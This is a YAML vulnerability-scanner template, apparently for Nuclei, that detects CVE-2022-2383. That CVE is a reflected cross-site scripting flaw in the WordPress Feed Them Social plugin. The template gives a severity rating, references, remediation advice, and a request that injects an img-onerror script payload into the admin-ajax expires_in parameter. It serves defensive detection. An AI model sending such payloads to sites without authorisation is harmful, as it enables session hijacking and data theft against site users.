id: CVE-2022-2383 info: name: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting author: akincibor severity: medium description: | WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of the Feed Them Social plugin (3.0.1 or higher) to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2383 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 epss-score: 0.00119 epss-percentile: 0.45893 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: slickremix product: feed_them_social framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E' matchers-condition: and matchers: - type: word part: body words: - '
' - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100a5b22a1d6d621822b3d1b2ef690cf3d7b3b755f23bc4c293fa67d14f2132d28202201bda611d9f62ad92af2019a89c386174eee2be3071997cc71530967a397a05b6:922c64590222798bb761d5b6d8e72950